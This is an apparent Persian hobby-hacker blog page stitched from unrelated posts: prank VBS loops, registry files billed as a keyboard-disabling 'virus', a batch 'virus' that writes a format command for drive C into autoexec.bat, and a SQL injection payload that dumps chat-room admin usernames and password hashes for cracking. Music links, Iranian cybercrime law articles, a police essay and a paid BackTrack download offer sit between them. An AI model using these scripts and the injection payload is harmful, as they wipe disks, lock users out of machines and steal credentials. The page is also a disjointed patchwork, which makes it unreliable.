اینم کد نرم افزار جدیدم حتما امتحان کنید ...................
کد رو از این پایین کپی کنید و یک فولدر باز کنید و این کد رو تو نت پد نوشته و آن را سیو از کنید واسم فابل را mr.vbs بزارید و یا با ی اسم دیگه سیو کنید ولی باید پسوندش حتما vbs باشه تا کار کنه .....
بعد این که فابل را داخل فولدری که باز کرده بودید سیو کردید آن را اجرا کنید و حالشو ببرید ......................
نظر از یادتون نره ها ..............
کد :
Set WshShell = WScript.CreateObject("WScript.Shell")
do
WshShell.SendKeys "^+(n)"
WScript.Sleep 500
WshShell.SendKeys "{enter}"
loop
بک ترک یک توزیع لینوکس(که البته در کنار ویندوز هم میشه استفاده کرد مثل خود من) بر اساس GNU است که برای آنالیز و کشف حفره ها و نقاط امنیتی سیستم های مختلف ارائه شده است. این توزیع لینوکس بسیار انعطاف پذیر می باشد و می توانید در هر جایی اقدارم به نصب و استفاده از آن نمایید مثل ماشین مجازی یا فلش مموری و یا هارد دیسک اصلی رایانه خودتان. نسخه ارائه شده ورژن Back Track 5 R3 می باشد که جدید ترین نسخه از این سیستم عامل می باشد که بر عکس نسخه قبل بر اساس Ubuntu می باشد . این توزیع از لینوکس یعنی بک ترک برای کسانی که در امنیت سیستم های رایانه ای و شبکه های فعالیت می کنند می تواند بسیار مفید باشد زیرا دارای ابزار پیشرفته ای برای تست امنیتی از سیستم های رایانه ای و شبکه است. بسیاری از ابزار های هک و شناسایی سیستم های مختلف به طور مجانی در بک ترک در کنار هم قرار داده شده اند که از افراد مبتدی تا حرفه ای می توانند با آن کار کنند. در صورتی به دنبال یک پکیج علی برای رفع نقاط امنیتی سیستم و شبکه خود هستید می توانید از این سیستم عامل که بر پایه لینوکس می باشد استفاده کنید.
ابزار هایی که در این سیستم عامل قرار داده شده اند:
- جمع آوری اطلاعات
- آنالیز شبکه های بیسیم و وایرلس
- شناسایی نقاط ضعیف امنیتی
- بازجویی دیجیتال
- کسب مجوز
- کار روی VOIP
- نقشه یابی و مکان یابی شبکه
- آنالیز و کشف حفره های امنیتی
- آنالیز دقیق برنامه های تحت وب و اینترنت
- مهندسی معکوس
- کسب دسترسی غیر مجاز
لینک های دانلود به صورت مستقیم در هر دو نسخه 32 و 64 بیتی قرار داده شده است.
هر دو نسخه KDE و GNOME به صورت جدا و رایگان قرار داده شده است.
اگر میخواهید که بک ترک را دانلود کنید و همینطور بتونید اموزش دانلود و قسمت های دیگه هم داشته باشید به ادرس زیر برید:(ادرس دانلود اپدیت شد)!
http://www.denadownload.com/%D8%AF%D8%A7%D9%86%D9%84%D9%88%D8%AF-%D8%B1%D8%A7%DB%8C%DA%AF%D8%A7%D9%86-backtrack-5-%D8%A8%DA%A9-%D8%AA%D8%B1%DA%A9/
اولاش یکم چرته ولی بعداش خیلی عالیه حتما گوش بده ضرر نمیکنی .........
امیدوارم خوشت بیاد
دانلود آهنگ با کیفیت MP3 320
Busta Rhymes Ft. Eminem - Calm Down
دانلود آهنگ با کیفیت MP3 128
Busta Rhymes Ft. Eminem - Calm Down
بدین منظور:
ابتدا دو فایل REG با نام های Reg-on.REG و Reg-off.REG با برنامه ی Notepad درست کنید.
سپس در فایل Reg-on.REG دستورهای زیر را بنویسید:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Response]
"Flags"="127"
[HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry]
"Flags"="3"
"WindowsEffect"="3"
و در فایل Reg-off.REG نیز دستورهای زیر را وارد کنید:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Response]
"Flags"="126"
[HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry]
"Flags"="2"
"WindowsEffect"="0"
بدین ترتیب با دبل کلیک بر روی REG-on.REG ویروس فعال شده و بعد از بوت کردن کامپیوتر ویروس عمل کرده و می توانید نحوه کار آن را مشاهده کنید و با دبل کلیک بر روی Reg-off.REG ویروس غیر فعال شده و با ریبوت دوباره از کار می افتد.
حالا ویروس شما آماده است و شما می توانید برای سرگرمی و نه اذیت و آزار دیگران از آن استفاده کنید.
نکات مهم :
1- وقتی بر روی فایل های Reg کلیک می کنید باید بعد از آن yes را بزنید تا فایل ریجستری کار کند.
2- چون این ویروس صفحه کلید را از کار می اندازد در صورت استفاده از چند Acount در ویندوز و دارا بودن پسورد ، پسورد آنها را پاک کنید تا مشکلی پیش نیاید.
3- هر دو فایل را با پسوند .Reg ذخیره کنید (طریقه ذخیره کردن با پسوند .Reg = روی Save As کلیک کرده و Save As Type را روی All Files گذاشته و در قسمت File Name تایپ می کنید Reg-on.REG یا Reg-off.REG و Save را می زنید)
سلام دوستان
اگر سفارش خاصی داشتید به ایمیل زیر ارسال کنید .......:
saeedjahantab78@gmail.com
برای ساخت این ویروس باید کد های زیر را در نت پد بنویسید و با فرمت bat. یا همان cmd سیو کنید
به همین راحتی ......
اینم کد ویروسمون cmd:
echo off@
call attrib -r -h c:autoexec.bat > nul
echo @echo off > c:autoexec.bat
echo format /autotest c:/q > nul >> c:autoexec.bat
call attrib +r +h c:autoexec.bat > nul
exit
امیدوارم خوشتون بیاد من که عاشق این آهنگم
واقعا بدنمو به لرزه میندازه حرفاش .....
حالا .....
حتما دانلود کن ....
متن آهنگ :
ماده2ـ هر کس به طور غیرمجاز محتوای در حال انتقال ارتباطات غیرعمومی در سامانههای رایانهای یا مخابراتی یا امواج الکترومغناطیسی یا نوری را شنود کند، به حبس از شش ماه تا دو سال یا جزای نقدی از ده میلیون (10.000.000) ریال تا چهل میلیون (40.000.000) ریال یا هر دو مجازات محکوم خواهدشد.
ماده3ـ هر کس به طور غیرمجاز نسبت به دادههای سری درحال انتقال یا ذخیرهشده در سامانههای رایانهای یا مخابراتی یا حاملهای داده مرتکب اعمال زیر شود، به مجازاتهای مقرر محکوم خواهدشد:
الف) دسترسی به دادههای مذکور یا تحصیل آنها یا شنود محتوای سری در حال انتقال، به حبس از یک تا سه سال یا جزای نقدی از بیست میلیون (20.000.000) ریال تا شصت میلیون (60.000.000) ریال یا هر دو مجازات.
ب) در دسترس قراردادن دادههای مذکور برای اشخاص فاقد صلاحیت، به حبس از دو تا ده سال.
ج) افشاء یا در دسترس قرار دادن دادههای مذکور برای دولت، سازمان، شرکت یا گروه بیگانه یا عاملان آنها، به حبس از پنج تا پانزده سال.
تبصره1ـ دادههای سری دادههایی است که افشای آنها به امنیت کشور یا منافع ملی لطمه میزند.
معرفی پلیس فتا(پلیس سایبری)
در گذر زمان، با افزایش شناخت، آگاهی و دانش انسان در خصوص پدیدهها، نیازها و شیوهی پاسخگویی به آنها، رفته رفته علم و فنّاوری به وجود آمد و مدام در حلقهی پیشرفت قرار گرفت. تا جایی که امروزه این فنّاوری است که بسیاری از شؤون و جنبههای زندگی انسان را بازتعریف میکند و اگر چه مزایای فراوانی نیز برای او فراهم آورده است، گاه انسان را در پی خود کشیده، تا جایی که ساختهها و پرداختههای دست بشر، انسان سرگشتهی عصر انفجار اطّلاعات را اسیر خود ساخته و به هر سو که اراده کند، میکشد.
نیمهی پایانی قرن بیستم و پس از جنگ جهانی دوّم، دورهی طلایی دانش و فنّاوری بشر و دورهی انتقال از عصر صنعت و ماشین به عصر فنّاوری اطّلاعات است. توسعهی شبکهها با کارکردهای نظامی در ابتدا و توسعهی آنها و تعریف کارکردهای جدید و ایجاد امکان اتّصال مراکز دانشگاهی، پژوهشی، علمی و تبادل اطّلاعات با یکدیگر در این نیمه اتّفاق افتادهاست. تجاریسازی فنّاوری اطّلاعات و ارتباطات و به تبع آن کاهش هزینههای رایج و امکان استفادهی عموم از این فنّاوری، اینترنت را به معنای امروز آن در دههی پایانی قرن بیستم به مردم معرّفی نمود و امروزه این فنّاوری عظیم با میلیاردها رایانه، میلیونها خدماتدهنده و صدها هزار شاهراه ارتباطی اصلی در برابر بشر قرار دارد تا از مواهب و مزایای بیبدیل آن استفاده کند یا خود را با پلیدیها و آسیبهای آن به نابودی کشد.
رایانه، اینترنت و تمامی ابزارهای مبتنی بر فنّاوری اطّلاعات و ارتباطات، در ابتدا و در ذهن و تصمیم مبدعان و مخترعان آن، صرفاً با هدف خدمت به نوع بشر و سادهسازی و افزایش کیفیت زندگی انسان، طرّاحی و تولید شدند. امّا در عمل تبدیل به چاقوی دولبهی گشتند که سعادت و شقاوت را همزمان با هم به ارمغان میآورند و شهروند امروز دهکدهی دیجیتالی جهانی را در برابر یک انتخاب و یک سؤال بزرگ قرار دادهاست که «آیا انسان نیازمند بازتعریف نیازها، خواستهها، منافع و مضارّ خود در فضای به اصطلاح جدید مجازی است؟»
فنّاوری اطّلاعات و ارتباطات ضمن تأثیرگذاری بر تمامی جنبهها و شؤون زندگی اجتماعی بشر، بر جرایم، تهدیدها و آسیبها نیز تأثیر گذاشته است. بسیاری از جرایم قدیمی با استفاده از ابزارهای رایانهای با سهولت، اثرگذاری و منافع بیشتر برای مجرمین از سوی آنان صورت میگیرند و حتّی دستهی دیگری از جرایم که کاملاً جدید بوده و صرفاً اختصاص به فضای مجازی دارند نیز شکل گرفته و در قاموس مجرمین از منظر ارتکاب و در قاموس پلیس از منظر پیجویی و مقابله وارد شدهاند.
جرایم رایانهای
همزمان با توسعه و کاربردپذیری رایانه و سیستمهای رایانهای، جرایم رایانهای هم به وجود آمدهاند. اگرچه دامنه و حوزهی وقوع جرم در هر حوزه با توجّه به ویژگیها و وسعت کاربرد و استفاده متفاوت بودهاست. از سال 1960 میلادی تا کنون سه نسل از جرایم رایانهای برشماری شدهاند. نسل اوّل که مقارن سالهای دههی هشتاد، هفتاد و اوایل دههی هشتاد میلادی است و چون استفاده از اینترنت در آن زمان شیوع نداشت، عمدهی جرایم مرتبط با رایانهها بود و از این رو این دسته از جرایم صرفاً به «جرایم رایانهای» یاد میشوند. نسل دوّم جرایم رایانهای از اوایل دههی هشتاد تا اوایل دههی نود به وقوع پیوستند که به «جرایم علیه دادهها» تعبیر میشوند. در این نسل، «داده» صرفنظر از اینکه در رایانه قرار داشته باشد، در واسطها و ابزارهای انتقال مورد توجّه قرار گرفت و دیگر تأکیدی بر رایانه نبود. نسل سوّم رایانهای نیز همزمان با فراگیر شدن اینترنت از اوایل دههی 1990 میلادی به وجود آمدند. این جرایم که با گسترش کاربرد شبکه و اینترنت به وجود آمدند نام «جرایم سایبری» را به خود گرفتند.
خوب با یک اموزش دیگه در خدمتونم این بار با اموزش هک چت روم های هاست به هاست خوب این کار خیلی ساده است اول میرید تو یک چت روم که رو سرورو هاست به هاست باهش بعد تو قسمت امتیازت کلیک می کنیدبعد یک کد هستش که اونوتو قسمت جستجو می کنید بعد اسم مدیر ها میاد و چند تا کد جلوشون کدشو کپی کنید و میرید به سایت md5online.org بعدش اون کدو تو کپی یم کنید اینتر میزنید و اخرش رمز میاد براتون ...
اینم کد فقط از این کد در صورت نیاز استفاده کنید قصد ما آدم ازاری نیست
union select 1,2,3,4,5,6,7,8,9,10,group_concat(etchat_username,0x3a,etchat_userpw),12,13,14,15,16,17 from db1_etchat_user where etchat_userprivilegien='admin'-- and 'x'='x
پدر راک که میگن اینه
دانلود موزیک ویدیو با کیفیت عالی (HD)
دانلود موزیک ویدیو با کیفیت عالی (FULL HD)
تمام
این ویروس کاملا بی خظر است و وقتی کار میکنه که روی آن کلیک کنید
این ویروس برای ترساندن طرف به کار میرود یا شوخی های هک .....
و این ویروس بعد از ریستارت کتمپیوتر از کار میوفته
کد:
do msgbox("hacked hahahaha...") msgbox("mr.s-j") loop
این کد را در نت پد بنویسید و در آخر به سیو از بروید و بعد از وارد کردن اسم سند خود نقطه vbsرا تایپ کنید مثلا اگر اسم سند mr است باید mr.vbsتایپ کنید و سیو کنید و بعد آن را اجرا کنید
موفق باشید
بک ترک یک سیستم عاملی است که در واقع سیستم یک هکر واقعی است که امکان هک
(وای فای .سایت ....)را به هکر میدهد
ولی اگر کسی استفاده درست از این برنامه را بلد نباشد 100%پی گرد قانونی دارد و یک جرم محسوب میشود
در این پست آموزش گام به گام بک ترک را گذاشته ایم
البته بک ترک کالی یعنی آخرین ورژن بک ترک
برای دریافت لینک دانلود باید یک عدد شارژ ایرانسل 10 هزاری به صورت خصوصی به ما فرستاده شود
و همراه آن ایمیل خود را نیز وارد کنید تا ما لینک را به ایمیل شما بفرستیم
مطمئن باشید بعد تا 24 ساعت آینده لینک دانلود بک ترک و پی دی اف آموزشی که برای شما عزیزان ساخته ایم فرستاده میشود
در صورتی که لینک را دریافت نکردید
خواهشن به ایمیل زیر عدد 1 را بفرستید تا درستی ایمیل شما تایید شود در صورت درستی لینک دانلود برای شما ارسال خواهد شد
HACKER99995BLACK@GMAIL.COM
حجم بک ترک :2GB
حجم پی دی اف :98KB
متشکریم
black hat hacker